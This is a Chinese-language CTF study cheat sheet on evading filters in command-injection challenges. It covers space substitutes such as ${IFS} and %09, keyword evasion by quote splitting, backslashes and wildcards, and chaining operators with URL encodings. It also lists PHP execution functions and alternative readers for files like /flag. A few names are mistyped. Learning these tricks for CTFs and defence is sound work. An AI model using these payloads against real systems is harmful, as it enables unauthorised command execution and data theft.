命令执行绕过

直接闹麻了 ，命令执行绕不过空格的来了🤣，都能执行命令了，空格绕不过去直接全盘皆失

赶紧补充一下自己的命令执行绕过知识😭

空格绕过

\t

%09

${IFS}

$IFS$9

$IFS

%20

{} 例如 ：{cat,1.txt}

<或是 << 例如 :cat<flag.txt

关键字过滤绕过

字符串拼接绕过

fl'.'ag

双引号和反引号

fl""ag、fl``ag

通配符

?：一次只能匹配一位

*：一次可以匹配多位

反斜杠绕过

cat fl\ag.p\hps

内联执行绕过

a=c;b=a;c=t;$a$b$c /1.txt

就是前面拼接，后面$调用

拼接命令

分号；：多个命令无论 对错顺序执行

&：作用和分号一样，使用时要先进行url编码为%26才行

&&：前面命令执行不成功 后面无法执行

%26%26

管道输出符号|：前面命令的输出作为后面命令的输入，把前面命令的结果作为后面命令的参数；前面后面的命令都执行，但是只显示后面的命令 执行 结果

||：前面的命令执行成功，则后面的命令不会执行，前面的命令执行失败，则后面的命令执行成功

常见函数

system

exec：示例exec("cat /flag")，其本身没有回显，需要使用>>追加到其他文件

例如：exec("dir >> 2.php");

passthru(读取二进制流)：system()的平替，写个命令就会执行命令，自己能 回显

shell_exec和反引号``：格式分别为shell_shell(ls)和 `ls`，不能自己回显，需要借助echo\print登 输出结果

popen：语法为popen(string $command , string $mode)，command参数：要执行的命令，mode参数 ：模式 r 表示阅读，w 表示写入，不能自己回显，需要print_r等输出内容

proc_popen：语法为proc_open($command , $desckriptor spec , $pipes , $cwd , $env ,vars ,$options)

$command 是要执行的命令 $descriptorspec是一个描述符规范数组，用于指定进程的输入、输出和错误的文件描述符 $pipes是一个引用变量，用于存储与进程相关的管道 $cwd（可选）是设置子进程的当前工作目录 $env（可选）是设置子进程 的环境变量 $other_options（可选）是其他选项，如设置超时等

读取命令绕过

tac：反向显示，从最后一行往前显示

more：一页一页显示档案内容

less：与more类似

tail：查看末尾几行

nl：显示的时候，顺便输出行号

od：以二进制 方式读取档案内容

xxd：读取二进制文件

sort：主要用于排序文件

uniq：报告或删除文件中重复的行，当成cat用就行

file -f：报错出具体内容

例如：passthru("file -f /flag");

grep：在文本中查找指定字符串

例如：passtru("grep fla /fla*")； grep fla /fla*命令会匹配根目录下所有以 fla开头的文件，（不包括子目录） 然后将 这些文件中包含字符串fla的行输出到终端上 。

strings：相当于cat